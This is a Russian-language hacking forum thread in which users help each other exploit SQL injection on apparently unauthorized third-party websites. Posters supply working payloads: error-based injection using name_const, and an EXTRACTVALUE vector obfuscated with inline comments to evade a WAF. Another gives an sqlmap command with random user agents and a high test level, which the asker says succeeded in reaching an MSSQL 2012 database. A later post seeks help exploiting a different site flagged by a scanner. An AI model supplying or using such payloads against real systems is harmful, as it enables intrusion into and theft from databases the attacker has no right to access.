Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   SQL /site/1' (https://forum.antichat.xyz/showthread.php?t=437042)

magichead 10.02.2016 08:22
Помогите расскрутить sql

Вид такой:

site.com/city/1'

Все перелазил ничего не нашел!

Код ошибки

1)Throwable_SQL_Exception [ 0 ]: Message: Failed to query SQL statement. Reason: Incorrect syntax near 'id' and Draft = 0'.

Код:
MODPATH/leap/classes/Base/DB/MsSQL/DataReader/Standard.php [ 48 ]

43      */
44    public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL) {
45        $resource = $connection->get_resource();
46        $command = @mssql_query($sql, $resource);
47        if ($command === FALSE) {
48            throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @mssql_get_last_message()));
49        }
50        $this->command = $command;
51        $this->record = FALSE;
52    }

OxoTnik 10.02.2016 10:02
Error dased

magichead 10.02.2016 10:48
Цитата:
Сообщение от OxoTnik

Error dased
это как понять?

site.com/city/1' - не могу понять как сделать правельную sql типо .php?city=1'

OxoTnik 10.02.2016 11:16
site.com/city/1'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1

magichead 10.02.2016 13:21
Цитата:
Сообщение от OxoTnik

site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1
Перекидывает на 404

А можно в sqlmap какнибудь раскрутить?

MaxFast 10.02.2016 14:25
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.

Код:
site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+
Местный WAF всему виной.

magichead 10.02.2016 14:47
Цитата:
Сообщение от OxoTnik

site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1
Перекидывает на 404

А можно в sqlmap какнибудь раскрутить?

Цитата:
Сообщение от MaxFast

Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.
Код:
site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+
Местный WAF всему виной.
(((всерано перекидывает на 404

Shubka75 10.02.2016 16:11
Цитата:
Сообщение от magichead

А можно в sqlmap какнибудь раскрутить?
sqlmap.py -u "site.com/city/1*" --level=5 --random-agent

magichead 10.02.2016 21:31
Цитата:
Сообщение от Shubka75

sqlmap.py -u "
site.com/city/1*
" --level=5 --random-agent
Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?

blackbox 13.02.2016 23:20
Цитата:
Сообщение от magichead

Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?
Можно посмотреть в лог-файле sqlmap, возможно консоль не поддерживает данную кодировку (какая бы она ни была), но это только предположение.

.Light. 02.03.2016 09:22
Как раскрутить такую скулю?

site.ru/v2-live-with-a-5-1-win/

Acunetix:

Path Fragment (suffix /) input - was set to success' AND 3*2*1=6 AND '000CDY9'='000CDY9

site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/

BabaDook 03.03.2016 16:18
Цитата:
Сообщение от .Light.

Как раскрутить такую скулю?
site.ru/v2-live-with-a-5-1-win/
Acunetix:
Path Fragment (suffix /) input
-
was set to
success' AND 3*2*1=6 AND '000CDY9'='000CDY9
site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/
site.ru/v2-live-with-a-5-1-win/* не работает?


Время: 05:57